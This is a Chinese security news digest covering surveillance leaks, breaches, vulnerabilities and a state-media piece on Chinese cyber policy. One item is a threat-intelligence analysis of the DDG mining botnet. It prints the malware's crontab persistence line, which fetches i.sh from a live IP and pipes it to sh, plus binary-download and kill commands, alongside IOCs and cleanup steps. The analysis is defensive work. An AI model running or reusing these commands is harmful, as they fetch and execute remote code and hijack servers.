安全快讯Top News

诺基亚员工意外泄露了俄罗斯电信运营商 SORM 监控设备的秘密

外媒刚刚揭示了俄罗斯电信运营商机房中神秘的 SORM 监控设备,据说它们被安插在各个城市的带锁房间,并且直连该国某些大型电信运营商的电话和互联网络。这些设备的大小与一台洗衣机相当,可容纳来自俄罗斯安全部门的特殊设备,收集来自数以百万计的用户的电话和信息。尽管有着相应的强制性法律要求,但这套系统的主要功能还是处于严格的保密状态。 (SORM 设备谍照) 由目前已曝光的一些文件可知,这套系统和监控客户的电话、消息、数据和移动电话系统。据说这些文件是在诺基亚员工使用的无保护备份驱动器网络上找到的 这些文件是在 Nokia Networks(前身为诺基亚-西门子通信公司)员工拥有的无保护备份驱动器上找到的,双方有着长达十年的合作关系,对 MTS 网络实施维护和升级,以确保其符合 SORM 标准。 在发现了相关文件流出后,安全企业 UpGuard 网络风险研究主管 Chris Vickery 向诺基亚汇报了这一安全失误。在周三发布的一份报告中,UpGuard 称诺基亚在四天后找到了泄露来源。 (MTS 示意图)   诺基亚发言人 Katja Antila 在一份声明中称:“我司现任员工将包含旧工作文件的 USB 驱动器连接到了家用 PC 上,但由于错误的配置,导致其 PC 与 USB 驱动器无需身份验证,即可被互联网上的其他人所访问”。 在注意到此事后,诺基亚已经与该名员工取得了联系、断开了机器的连接、并将其带回了公司,目前相关调查正在进行之中。据说本次暴露的数据接近 2TB,其中主要包含了来自诺基亚公司内部的文件。 从外媒获悉的部分内容可知,Nokia Networks 参与了电信 / 互联网服务提供商提供的“合法拦截”项目。根据俄罗斯法律要求,大型电信运营商必须安装所谓的 SORM 设备。 (一份神秘的 SORM 设备部署楼层平面图) 据悉,SORM 全称为“可操作活动调查系统”的首字母缩写,最初于 1995 年作为合法的拦截系统进行开发,允许俄罗斯联邦安全局(FSB)依法访问电信运营商的数据,涵盖通话记录等内容。 过去十年,调整后的法规允许政府建立扩展到互联网服务提供商和网络公司,后者被迫安装了可以拦截网络流量和电子邮件的 SORM 设备,甚至有几家科技企业因未安装而遭到了俄罗斯互联网监管机构的处罚。 事实上,大多数国家(包括英美)都有相关的法律要求电信运营商安装合法的拦截设备。不过 Nokia Networks 宣称其仅参与了其中的一部分,并且会在将设备售往有潜在风险地区时作出充分的合规性评估。     (稿源:cnBeta,封面源自网络。)  

Github 收购代码分析平台公司 Semmle 致力于查找零日漏洞及其变种

已被微软纳入麾下了开源代码托管平台 Github,刚刚宣布收购了一家名叫 Semmle 的代码分析平台公司。后者致力于查找零日漏洞,并对其变体展开自动化分析。Semmle 的语义代码分析引擎,允许开发者编写查询、识别大型代码库中的编程模式、搜索漏洞及其变种。此前,Semmle 已被谷歌、Uber、微软和诸多开源项目开发者用于提升其产品和服务的安全性。 微软表示,本次收购有助于让 Semmle 吸引到更多开发者,但现有的产品和客户并不会受到任何影响。 在接下来几个月里,您可期待 Semmle 与 Github 产品线实现更深层次的整合。此外 Semmle 透露,LGTM.com 将继续免费提供公共存储库和开源软件。 据悉,安全研究人员可借助 Semmle 简单的声明性查询,快速查找到代码中的相关漏洞。然后,这些团队会与 Semmle 社区分享他们的查询,以提升代码库中其它项目的安全性。 Nat Friedman 表示:作为软件安全社区的最新努力,没有一家公司可以独自完成每一个漏洞的查找、并为背后的开源供应链提供完整的保护。 好消息是,Semmle 正好可以填补这方面的空缺,因其采用了基于社区驱动的安全漏洞识别与预防措施。   (稿源:cnBeta,封面源自网络。)

惠普打印机被发现偷偷回传数据:隐藏极深

在打印机行业,惠普可以说是霸主级别的存在,但是软件工程师Robert Heaton近日却发现,惠普打印机会将部分用户数据回传给惠普,默认开启,而且隐藏相当深。 据发现,在惠普打印机的安装过程中,有一个很难为人注意的“数据搜集通知与设置”(Data Collection Notice & Settings),惠普在其中声明会尝试搜集用户的相关打印情况,并传回给惠普,目的是改善广告、用户体验。 但是,惠普故意将传回数据类型的选择隐藏了起来,如果不是特别细心、特别懂技术,几乎不可能发现,而且这个“功能”是默认开启的,等于几乎所有用户在使用惠普打印机的时候,都在无意中将自己的相关数据交给了惠普。 惠普打印机会搜集所有产生文档的应用的相关数据,基本上你打印的所有类型文档(txt/doc/jpg/pdf等等)、时间戳、文档体积、使用报告等等,都在其中。 惠普在隐私政策中也强调了,惠普不会扫描用户打印文档的具体内容,只是相关特性和规格。 但是这种后台偷偷搜集数据的行为,让你的打印行为毫无隐私可言,仍然让人不寒而栗。   (稿源:快科技,封面源自网络。)

LastPass 修复了可能让恶意网站提取用户密码的漏洞

LastPass修补了一个错误,该错误会使恶意网站提取该服务浏览器扩展程序输入的先前密码。 ZDNet报告称该漏洞是由谷歌Project Zero团队的研究员Tavis Ormandy发现,并在8月29日一份漏洞报告中披露。 LastPass在9月13日修复了该问题,并将更新部署到针对所有浏览器的LastPass扩展当中。 该漏洞工作原理是诱使用户进入恶意网站,并欺骗浏览器扩展程序使用以前访问过的网站密码。 Ormandy指出,攻击者可以使用谷歌翻译等服务伪装恶意网站地址,并诱使易受攻击的用户访问流氓网站。 虽然LastPass说应该补丁自动更新,但您一定要检查您的LastPass扩展是否是最新版本,特别是如果您使用的浏览器允许您禁用扩展自动更新。这个更新之后,LastPass浏览器扩展的版本号是4.33.0。LastPass表示,它认为只有Chrome和Opera浏览器受到了这个漏洞的影响,但是还是采用严格预防措施,它已经为所有浏览器LastPass扩展部署了相同的补丁。 在其博客上发布的一份声明中,LastPass淡化了该漏洞严重性。该公司安全工程经理Ferenc Kun表示,该漏洞依赖于用户访问恶意网站,然后被“欺骗”多次点击相关恶意页面。但Ormandy仍然将该漏洞评为“高”严重等级。   (稿源:cnBeta,封面源自网络。)

数据库泄露了厄瓜多尔大多数公民的数据 其中包括 670 万儿童

ZDNet了解到,由于数据库配置错误,厄瓜多尔大部分人口(包括儿童)的个人记录已在网上曝光。两周前,vpnMentor安全研究人员Noam Rotem和Ran Locar发现了这个数据库泄露。这应该是厄瓜多尔历史上最大的数据泄露事件之一,厄瓜多尔是一个拥有1660万公民的南美小国。 这次泄露的数据库总共包含大约2080万个用户记录,这个数据库记录的数量大于该国家的总人口数,其中原因可能来自重复记录或较旧的条目,包含死者的数据。这项数据分布在不同的索引中。这些索引包含不同的信息,其中存储了用户详细信息,如姓名,家庭成员,民事登记数据,财务和工作信息,以及汽车所有权数据。 根据这些索引的名称,整个数据库可以根据数据的假定来源分为两大类。有一些数据似乎是从政府来源收集的,还有一些数据似乎是从私人数据库收集的。这些数据包含公民全名、出生日期、出生地、家庭住址、婚姻状况、塞杜拉细节(国家身份证号码)、工作/工作信息、电话号码和教育程度等条目。 然而,事情并没有就此停止。安全研究人员发现整个数据库当中也包含大量儿童信息,有些儿童甚至是今年春季才出生。具体来说,其中包含大约677万个18岁以下儿童条目。这些条目包含姓名、出生地、家庭住址和性别等信息。   (稿源:cnBeta,封面源自网络。)

黑客利用“Simjacker”漏洞窃取手机数据 或影响 10 亿人

据TNW报道,网络安全研究人员警告称,SIM卡存在一个严重的漏洞,使得远程攻击者可以在用户不知情的情况下发送短信攻击目标手机并监控受害者。都柏林的AdaptiveMobile Security公司表示,这个被称为“Simjacker”的漏洞已经被一家间谍软件供应商利用了至少两年的时间,不过该安全公司并未透露利用这一漏洞公司的名称以及受害者信息。 据称,“Simjacker”漏洞攻击包括向手机发送一条短信,短信中包含一种特定类型的类似间谍软件的代码,然后手机会指示手机内的SIM卡控制手机,检索并执行敏感命令。这一漏洞存在于称为 S@T的浏览器中,该浏览器作为GSM 普遍使用的手机应用工具包(STK)的一部分,嵌入大多数手机SIM卡中,为客户提供增值服务。 AdaptiveMobile 表示,至少有 30 个国家的移动运营商积极使用 S@T 浏览器技术,总人数超过 10 亿。这就意味着,在全球或有逾10 亿手机用户可能会受到影响。 研究人员透露,攻击每天都在发生,在 7 天的时间里,有几个电话号码被追踪了数百次。 虽然检测到主要攻击涉及到的是盗取手机用户的位置,但现在Simjacker 攻击范围已经扩大到欺诈、诈骗电话、资讯泄露、拒绝服务攻击,以至是间谍活动等等。   (稿源:cnBeta,封面源自网络。)

习近平论网络安全十大金句

共同织密网络安全防护网 ——党的十八大以来网络安全工作综述   当今中国,网信事业蓬勃发展,网民数量全球第一、电子商务总量全球第一。必须正确把握安全与发展的关系,让网络空间既充满活力又安全清朗。 “没有网络安全就没有国家安全。”党的十八大以来,以习近平同志为核心的党中央系统部署和全面推进网络安全和信息化工作。在习近平总书记关于网络强国的重要思想指引下,我国网络空间日渐清朗,网络安全保障体系日益完善,网络安全保障能力不断增强,网络空间命运共同体主张获得国际社会广泛认同。   全面构建网络安全制度体系 2015年12月,全球连锁酒店凯悦集团支付系统被恶意软件入侵,大量用户数据外泄;2018年3月,某社交平台有超过5000万名用户个人资料疑遭泄露…… 近年来,类似的黑客攻击和个人信息泄露时有发生,网络安全愈发引人关注。 习近平总书记深刻指出:“网络空间不是‘法外之地’。网络空间是虚拟的,但运用网络空间的主体是现实的,大家都应该遵守法律,明确各方权利义务。” 依法管网、依法办网、依法上网,确保互联网在法治轨道上健康运行,正是破题之策。党的十八大以来,我国始终坚持依法治网,形成党委领导、政府管理、企业履责、社会监督、网民自律等多主体参与的网络安全治理格局。 ——出台网络安全法、国家网络空间安全战略、“十三五”国家信息化规划等网络安全法律法规和战略规划,制定发布网络安全国家标准289项,网络安全各项工作纳入法治化轨道; ——组织开展移动互联网应用(APP)违法违规收集使用个人信息专项治理,对存在严重问题的APP采取约谈、公开曝光、下架等处罚措施,切实维护广大网民在网络空间的合法权益; ——建立关键信息基础设施安全保护制度,明确关键信息基础设施范围及保护工作部门,建立健全安全保护责任制,强化供应链安全管理和重要数据安全管理,加强监测预警和应急处置工作,不断提升安全防护能力。 近年来,国家相关部门持续开展“净网”“剑网”“清源”“护苗”等系列专项治理行动,网络谣言、网络色情等乱象得到有效整治。其中,针对老百姓深恶痛绝的电信网络诈骗犯罪,公安机关坚持侦查打击、重点整治、防范治理三管齐下。今年1至7月,共抓获电信网络诈骗犯罪嫌疑人6.5万名,破获电信网络诈骗案件7.5万起,同比分别上升32.3%和8.6%。自今年5月以来,发案数量与去年同期相比,连续4个月保持下降趋势。   共筑风清气正的网络家园 联合整治炒作明星绯闻隐私和娱乐八卦、约谈直播短视频平台、将违规网络主播纳入跨平台禁播黑名单……2018年以来,国家主管部门协同发力,对当前社交媒体及网络视频平台上存在的违法违规行为打出一系列“组合重拳”。 “还网络空间以风清气正,一定要好好整治这些乱象!”“严管这些带来负能量的主播们!”网民们支持、点赞的声音反映了广大人民群众对让网络空间清朗起来的热切期盼。 网络空间是亿万民众共同的精神家园,网络空间天朗气清、生态良好,符合人民利益。习近平总书记强调,我们要本着对社会负责、对人民负责的态度,依法加强网络空间治理,加强网络内容建设,做强网上正面宣传,培育积极健康、向上向善的网络文化,用社会主义核心价值观和人类优秀文明成果滋养人心、滋养社会,做到正能量充沛、主旋律高昂,为广大网民特别是青少年营造一个风清气正的网络空间。 从《“一带一路”大道之行》到《小账本连着大情怀》,从“砥砺奋进的五年”到“壮丽70年 奋斗新时代”,党的十八大以来,重大主题宣传综合运用互联网传播方式手段,形成“往深里走、往心里走、往实里走”的宣传效果。 抗灾救灾时的守望相助、见义勇为中的果敢无畏、热心公益里的慷慨解囊……党的十八大以来,正能量越来越多、越来越广地在网络上传播,那些感动中国的好人好事、浸润心灵的良知义举,生动具体地诠释着中国特色社会主义核心价值观,网络空间日益成为亿万民众共同的精神家园。   培育网络安全技术、产业、人才 商场购物,街边买菜,生活缴费,扫码支付已成常态。然而,享受便利的同时,人们也受到欺诈、盗窃等违法犯罪行为的滋扰。 如何让“扫一扫”更安全?支付宝推出保障计划,通过自主研发的智能实时风控系统,对每笔移动支付进行木马、钓鱼等8个维度的风险检测,防止二维码被复制和泄露,此外还配合人脸识别、眼纹等技术进行多因子验证,保障用户扫码支付安全。 “网络安全和信息化是一体之两翼、驱动之双轮。”网络安全,需要信息化发展作支撑,信息化发展需要网络安全来保障。 党的十八大以来,网络安全新兴技术不断涌现,防护网不断织密。一张小卡片能阻止敏感信息的获取、在线签证核身技术从源头对非法入境行为进行识别和拦截……网络安全产业迅速发展,增速领跑全球,根据中国信息通信研究院测算数据,2018年我国网络安全产业规模预计达545.49亿元。 “网络空间的竞争,归根到底是人才的竞争。”培养网络安全人才,才能夯实网络安全根基,更好地推动技术创新和产业发展,为建设网络强国提供智力支撑和人才保障。 2017年,中央网信办、教育部将西安电子科技大学、东南大学、武汉大学、北京航空航天大学、四川大学、中国科学技术大学、战略支援部队信息工程大学等7所高校,评选为首批一流网络安全学院建设示范项目高校。截至目前,已有40余所高校成立网络空间安全学院。 “网络安全人才培养和教育,不能孤立发展、闭门造车,而是要打造适应时代需要的复合型网络安全人才。”中国科学技术大学网络空间安全学院副院长、教授俞能海说。 推动全球网络安全治理体系变革 一个安全稳定繁荣的网络空间,对各国和世界都具有重大意义。如何共同维护网络安全,成为世界性课题。 “网络安全是全球性挑战,没有哪个国家能够置身事外、独善其身,维护网络安全是国际社会的共同责任。” “维护网络安全不应有双重标准,不能一个国家安全而其他国家不安全,一部分国家安全而另一部分国家不安全,更不能以牺牲别国安全谋求自身所谓绝对安全。” 在2015年第二届世界互联网大会开幕式上,习近平总书记向世界发出携手共建“网络空间命运共同体”的倡议,提出推进全球网络安全治理体系变革的“中国方案”,受到高度评价和广泛赞誉。 “‘中国的网络观’让人印象深刻。”著名计算机科学家罗伯特·卡恩说,习近平主席的一系列阐述,表明了互联网是一个非常独特的共同家园,所有人应该共同承担责任。 携手共建,方能乘风破浪。近年来,在中国的积极倡导下,从《网络空间国际合作战略》的发布,到杭州G20峰会《二十国集团数字经济发展与合作倡议》的签署,中国不断深化网络空间国际合作,推动世界各国共同构建一个安全稳定繁荣的网络空间。 中国不仅为推进全球网络安全治理体系变革提供“中国方案”,更以实际行动为世界网络安全和发展贡献中国力量。一大批优秀企业走出国门,在宽带信息基础设施、大数据、网络安全服务等新兴产业领域,为世界各国提供高质量的信息产品和安全技术服务。 “中国在共建网络空间命运共同体中扮演的角色十分重要。”塞尔维亚贸易旅游与通信部国务秘书塔提亚娜·马迪奇表示,作为世界上最大的发展中国家,中国保持自身安全发展的同时,还致力于推动世界各国共同搭乘互联网发展的快车,积极构建安全与公平的网络新秩序,“这为世界树立了榜样!”   (稿源:人民网,封面源自网络。)

警惕:DDG 挖矿僵尸网络利用 SSH 弱口令爆破攻击 Linux 服务器

感谢腾讯御见威胁情报中心来稿! 原文:https://mp.weixin.qq.com/s/twR_Jh3aT8n7be3kbmyDhA   一、背景 腾讯安全专家在为某企业客户进行例行安全巡检过程中,发现客户部署的腾讯御界高级威胁检测系统出现了SSH服务失陷感知信息。在征得客户同意后对客户机器进行远程取证,并结合御界的关键日志进行分析,我们发现这是一起针对SSH服务器弱口令爆破攻击事件。由于发现及时,工程师及时协助客户进行隔离及杀毒,并未造成损失。 腾讯安全御见威胁情报中心对本次攻击事件展开调查,结果发现,这是由大型挖矿僵尸网络DDGMiner发起的攻击事件。DDGMiner是最早于2017年被发现的挖矿僵尸网络,其特点为扫描攻击 SSH服务、Redis 数据库和OrientDB数据库等服务器,并在攻陷的服务器上植入挖矿木马挖掘门罗币获利。从病毒服务器的目录中last modified字段可以看到,本次攻击中样本的更新时间为2019-08-29,目前为4004版本。 对样本进行分析后,发现与此前版本不同的是,样本中新增了针对Nexus Repository Manager漏洞、Supervisord漏洞的利用攻击代码,其攻击流程大致如下: 根据腾讯云鼎实验室监测数据,云上主机遭受来自最新版本DDGMiner的攻击流量从2019.08.29开始出现,在8月30日到达峰值,8月31日到9月1日下降到一定范围之后趋于平稳,大部分攻击流量被有效拦截。 而在少量失陷主机中,90%以上遭到SSH弱口令爆破入侵,由此可见DDGMiner的主要传播方式仍然为SSH爆破。腾讯安全提醒企业用户务必使用高强度的SSH、Redis登录密码,避免因设置不当而遭受攻击造成不必要的损失。 二、详细分析 黑客在通过弱口令爆破或漏洞攻击入侵后首先下载Shell脚本i.sh,并将其安装为crontab定时任务每15分钟执行一次。 mkdir -p /var/spool/cron/crontabsecho "" > /var/spool/cron/rootecho "*/15 * * * * (/usr/bin/nfosfa4||/usr/libexec/nfosfa4||/usr/local/bin/nfosfa4||/tmp/nfosfa4||curl -fsSL -m180 http://68.183.140.39/i.sh||wget -q -T180 -O- http://68.183.140.39/i.sh) | sh" >> /var/spool/cron/rootcp -f /var/spool/cron/root /var/spool/cron/crontabs/root 然后检测是否已经存在进程nfosfa4,若存在则杀死进程并删除对应的文件,然后从服务器下载ddgs.$(uname -m)保存为nfosfa4,其中uname –m用来获取系统类型并映射到文件名。最后通过chmod +x给nfosfa4赋予可执行权限,从而完成木马的下载更新。 ps auxf | grep -v grep | grep nfosfa4 || rm -rf nfosfa4if [ ! -f "nfosfa4" ]; then curl -fsSL -m1800 http://68.183.140.39/static/4004/ddgs.$(uname -m) -o nfosfa4||wget -q -T1800 http://68.183.140.39/static/4004/ddgs.$(uname -m) -O nfosfa4fichmod +x nfosfa4 接着查找并杀死多个历史版本的病毒进程,进程名分别为nfosbcb、nfosbcc、nfosbcd、nfosbce、nfosfa0、nfosfa1、nfosfa2。 ps auxf | grep -v grep | grep nfosbcb | awk '{print $2}' | xargs kill -9ps auxf | grep -v grep | grep nfosbcc | awk '{print $2}' | xargs kill -9ps auxf | grep -v grep | grep nfosbcd | awk '{print $2}' | xargs kill -9ps auxf | grep -v grep | grep nfosbce | awk '{print $2}' | xargs kill -9ps auxf | grep -v grep | grep nfosfa0 | awk '{print $2}' | xargs kill -9ps auxf | grep -v grep | grep nfosfa1 | awk '{print $2}' | xargs kill -9ps auxf | grep -v grep | grep nfosfa2 | awk '{print $2}' | xargs kill -9 然后启动病毒的最新版本nfosfa4,病毒被存放于以下四个目录之一。 /usr/bin/nfosfa4 /usr/libexec/nfosfa4 /usr/local/bin/nfosfa4 /tmp/nfosfa4 nfosfa4是采用golang语言开发,编译成基于Linux的ELF可执行文件,并且采用UPX加壳保护。golang语言是一款开源编程系统,其优点为简单可靠,支持夸平台编译等。golang语言非常适合服务器编程、分布式系统和数据库相关的网络编程,而DDGMiner恰好符合这些特点。 为了便于分析,我们通过Linux下的UPX脱壳工具进行脱壳,然后使用IDAGolangHelper脚本在IDA中对函数进行重命名。处理之后可以比较清晰的看到样本中漏洞攻击、挖矿、清除挖矿竞品等功能。 在还原后的函数中,可以看到针对SSH爆破、以及针对Redis服务器、Supervisord服务器、Nexus Repository Manager服务器的漏洞利用攻击代码。 样本还使用了hashicorp的go开源库memberlist来构建分布式网络,memberlist是用来管理分布式集群内节点发现、节点失效探测、节点列表的开源程序(github: https://github.com/hashicorp/memberlist)。样本初次到达受害机时,会获取本地节点的地址和状态信息,然后尝试连接到内置的ip列表中的远端节点从而加入远端的集群。 memberlist利用被称为“疫情传播算法”的Gossip协议在僵尸网络集群中同步数据。Gossip 过程由种子节点发起,当一个种子节点有状态需要更新到网络中的其他节点时,它就会随机的选择周围几个节点散播消息,收到消息的节点也会重复该过程,直至最终网络中所有的节点都收到了消息。病毒通过这个过程将某个节点上获得更新的挖矿木马和攻击脚本同步到所有节点。 最后,在挖矿功能部分,通过main_ptr_miner_Download函数下载,main_ptr_miner_Update更新,main_ptr_miner_CheckMd5校验矿机Md5值,以及通过main_ptr_miner_Run启动矿机,并且通过调用main_ptr_miner_killOtherMiner对其他挖矿木马进行清除。 三、安全建议 1、使用高强度的Redis登陆密码、SSH登陆密码, 必要时添加防火墙规则避免其他非信任来源ip访问。 2、及时修复Redis、Nexus Repository Manager、Supervisord服务相关的高危漏洞。 3、已中毒的linux服务器可采用以下手动清理方案。 a)、crontab如果如果包含以下内容,进行清理: "*/15 * * * * (/usr/bin/nfosfa4||/usr/libexec/nfosfa4||/usr/local/bin/nfosfa4||/tmp/nfosfa4||curl -fsSL -m180 http://68.183.140.39/i.sh||wget -q -T180 -O- http://68.183.140.39/i.sh) | sh" b)、/var/spool/cron/root文件,如果包含以下内容,进行清理: "*/15 * * * * (/usr/bin/nfosfa4||/usr/libexec/nfosfa4||/usr/local/bin/nfosfa4||/tmp/nfosfa4||curl -fsSL -m180 http://68.183.140.39/i.sh||wget -q -T180 -O- http://68.183.140.39/i.sh) | sh" c)、/var/spool/cron/crontabs/root文件,如果包含以下内容,进行清理: "*/15 * * * * (/usr/bin/nfosfa4||/usr/libexec/nfosfa4||/usr/local/bin/nfosfa4||/tmp/nfosfa4||curl -fsSL -m180 http://68.183.140.39/i.sh||wget -q -T180 -O- http://68.183.140.39/i.sh) | sh" d)、删除以下文件 /usr/bin/nfosfa4 /usr/libexec/nfosfa4 /usr/local/bin/nfosfa4 /tmp/nfosfa4 /usr/bin/betsbcc /usr/libexec/betsbcc /usr/local/bin/betsbcc /tmp/betsbcc /usr/bin/brhjbcc /usr/libexec/brhjbcc /usr/local/bin/brhjbcc /tmp/brhjbcc e)删除/tmp目录下文件 qW3xT, qW3xT.1, qW3xT.2, qW3xT.3, qW3xT.4, ddgs.3010, ddgs.3011, ddgs.3013, ddgs.3016, 2t3ik, 2t3ik.m, 2t3ik.p, 2t3ik.s, imWBR1, imWBR1.ig, wnTKYg, wnTKYg.noaes, fmt.3018 4、使用腾讯御界高级威胁检测系统检测未知黑客的各种可疑攻击行为。御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。 IOCs IP 68.183.140.39 URL hxxp://68.183.140.39:8000/static/4004/ddgs.x86_64 hxxp://68.183.140.39:8000/static/4004/ddgs.i686 hxxp://68.183.140.39:8000/i.sh MD5 bdfa1c43b3e03880d718609af3b9648f 76309d50ad8412954ca87355274bd8ff 4f0ef26b713d28469d08a8a833339e77 参考链接: https://blog.netlab.360.com/fast-analyze-ddg-v3021-and-v3022/

新研究暗示 2016 年乌克兰停电事件背后的潜在原因

据外媒报道,2016年12月,俄罗斯黑客在乌克兰国家电网运营商Ukrenergo的网络中植入了一种被称为Industroyer或Crash Override的恶意软件。而在圣诞节前两天的午夜,网络犯罪分子利用已经部署好的恶意软件破坏了乌克兰首都基辅附近一个传输站的所有断路器,从而导致首都大部分地区断电。 虽然这起网络攻击引发了一系列问题,但却没有给出明确的答案:首先,这次网络攻击的真正动机是什么?第二,为什么一个恶意软件能够如此强大,它可以瞬间让整个城市进入黑暗之中,而一个小时后工厂的工人只需要打开断路器就能修复? 对此,来自工业控制系统网络安全公司Dragos的研究人员近日发布了一篇论文,他们在文中重建了2016年乌克兰断电的时间线,希望能为寻找上述问题的答案获得一些启发。在这篇题为《CRASHOVERRIDE: Reassessing the 2016 Ukraine Electric Power Event as a Protection-Focused Attack》的文章中,研究团队梳理了恶意软件的代码并重新访问了Ukrenergo的网络日志。他们得出的结论是,有证据表明,黑客的意图是造成更大强度的物理破坏,如果没有几个月也会将停电时间延长到数周甚至可能危及到现场工厂工人的生命。如果是这样的话,那么攻击基辅电力供应的恶意软件将只是另外两种恶意代码–Stuxnet和Triton的其中一种,这两种曾分别攻击过伊朗和沙特阿拉伯。 然而问题的实质则在于细节。文章作者、Dragos分析师Joe Slowik表示:“虽然这最终是一个直接的破坏性事件,但部署的工具和使用它们的顺序强烈表明,攻击者想要做的不仅仅是把灯关掉几个小时。他们试图创造条件,对目标传输站造成物理破坏。” 更具体一点说,Joe和Dragos给出的理论暗示了黑客利用Crash Override发送自动脉冲来触发断路器进而利用由西门子生产的Siprotec保护继电器的一个已知漏洞。尽管在2015年发布了一个修复上述漏洞的安全补丁,但乌克兰的许多电网站并没有更新它们的系统,这就位黑客们打开了一扇门,他们只需要发出一个电脉冲就能让安全继电器在休眠状态下失效。 为了搞明白这点,Dragos搜索了Ukrenergo的日志并将它所发现的信息的原始线程联系起来。他们第一次重构了黑客的操作方式,具体如下:首先,黑客部署了Crash Override;然后他们用它来处罚基辅北部一个电网站的每一个断路器进而导致大规模停电;一个小时后,他们发射了一个雨刷组件从而使发射站的电脑无法工作并阻止了对发射站数字系统的监控;死后,黑客破坏了该电站的4个Siprotec保护继电器,从而使电站容易受到危险高频率电力的影响。 事实上,这一事件并没有持续到最后。虽然Dragos无法找到黑客计划失败的原因,但它怀疑黑客的某些网络配置错误或现场工作人员在发现正在休眠的Siprotec继电器时做出的快速反应可能是挽救局面的原因。   (稿源:cnBeta,封面源自网络。)

微软总裁在新书中透露:特朗普顾问希望微软帮助美国政府监视其他国家

据外媒MSPoweruser报道,微软总裁兼首席法律顾问布拉德·史密斯(Brad Smit)最近发行了他的新书《工具和武器:数字时代的希望和危机》(Tools & Weapons: The Promise and the Peril of the Digital Age),而这本书打开了“潘多拉魔盒”。 本周早些时候,外媒曾报道称布拉德·史密斯认为美国政府对待华为的方式一点也不美国(un-American)。史密斯在其新书中还透露,泰勒·斯威夫特的律师曾在2016年威胁要起诉微软。因为微软的聊天机器人Tay的名字和Taylor很相似。 现在,Geekwire引用了他的书中的一段话,其中揭示了特朗普政府如何希望微软帮助其监视其他国家。史密斯在书中写道:“作为一家美国公司,你为什么不同意帮助美国政府监视其他国家的人?”他指出,微软向美国政府明确表示他们不愿意接受有关这个问题的任何讨论。 我指出,特朗普酒店刚刚在中东和宾夕法尼亚大街的街道上开设了新房产。“这些酒店是否会对那些留在那里的其他国家的人进行监视活动?这对家族企业来说似乎不太好。 – 当特朗普顾问询问为什么微软不帮助他们监视其他国家的人时,布拉德·史密斯如是说 布拉德·史密斯在新书中还介绍了微软等公司面临的类似复杂的法律和道德挑战。他指出,特朗普并不是第一个对微软提出异议的总统。该书的内容还包括微软与奥巴马政府就隐私与面部识别政策等问题存在分歧的情况。 政府如何管理比自己更大的技术?这可能是技术监管未来面临的最大难题。但是一旦你提出这个问题,答案的一部分就变得清晰了:政府需要共同努力。 – 布拉德·史密斯   (稿源:cnBeta,封面源自网络。)